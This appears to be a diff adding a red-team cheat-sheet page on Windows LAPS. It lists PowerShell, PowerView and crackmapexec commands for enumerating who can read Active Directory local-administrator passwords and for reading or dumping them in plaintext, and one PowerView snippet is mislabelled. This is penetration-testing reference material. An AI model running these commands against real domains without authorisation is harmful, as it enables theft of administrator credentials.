|
| 1 | +**LAPS** allows you to manage the local **Administrator** password (which is randomised, unique, and changed regularly) on domain-joined computers. These passwords are centrally stored in Active Directory and restricted to authorised users using ACLs. Passwords are protected in transit from the client to the server using Kerberos v5 and AES. |
| 2 | + |
| 3 | +When using LAPS, 2 new attributes appear in the computer objects of the domain: `ms-mcs-AdmPwd` and `ms-mcs-AdmPwdExpirationTime`. These attributes contains the plain-text admin password and the expiration time. Then, in a domain environment, it could be interesting to check which users can read these attributes. |
| 4 | + |
| 5 | +# Check If Activated |
| 6 | +```powershell |
| 7 | +reg query "HKLM\Software\Policies\Microsoft Services\AdmPwd" /v AdmPwdEnabled |
| 8 | +
|
| 9 | +dir "C:\Program Files\LAPS\CSE" |
| 10 | +
|
| 11 | +# Find GPOs that have "LAPS" or some other descriptive term in the name |
| 12 | +Get-DomainGPO | ? { $_.DisplayName -like "*laps*" } | select DisplayName, Name, GPCFileSysPath | fl |
| 13 | +
|
| 14 | +# Search computer objects where the ms-Mcs-AdmPwdExpirationTime property is not null (any Domain User can read this property) |
| 15 | +Get-DomainObject -SearchBase "LDAP://DC=sub,DC=domain,DC=local" | ? { $_."ms-mcs-admpwdexpirationtime" -ne $null } | select DnsHostname |
| 16 | +``` |
| 17 | + |
| 18 | +# Other Commands |
| 19 | +```powershell |
| 20 | +# Get commands available |
| 21 | +Get-Command *AdmPwd* |
| 22 | +
|
| 23 | +# List who can read LAPS password of the given OU |
| 24 | +Find-AdmPwdExtendedRights -Identity Workstations | fl |
| 25 | +
|
| 26 | +# Read the password |
| 27 | +Get-AdmPwdPassword -ComputerName wkstn-2 | fl |
| 28 | +``` |
| 29 | + |
| 30 | +## PowerView |
| 31 | +**PowerView** can also be used to find out **who can read the password and read it**: |
| 32 | +```powershell |
| 33 | +# Find the principals that have ReadPropery on ms-Mcs-AdmPwd |
| 34 | +Get-AdmPwdPassword -ComputerName wkstn-2 | fl |
| 35 | +
|
| 36 | +# Read the password |
| 37 | +Get-DomainObject -Identity wkstn-2 -Properties ms-Mcs-AdmPwd |
| 38 | +``` |
| 39 | + |
| 40 | +# Dumping Credentials via crackmapexec |
| 41 | +```bash |
| 42 | +# LDAP |
| 43 | +crackmapexec ldap <ip> -u <user> -p <password> -d <domain> -M laps |
| 44 | + |
| 45 | +# SMB |
| 46 | +crackmapexec smb <ip> -u <user> -p <password> --laps |
| 47 | +``` |
| 48 | + |
| 49 | +# References |
| 50 | +- [https://book.hacktricks.wiki/en/windows-hardening/active-directory-methodology/laps.html](https://book.hacktricks.wiki/en/windows-hardening/active-directory-methodology/laps.html) |
0 commit comments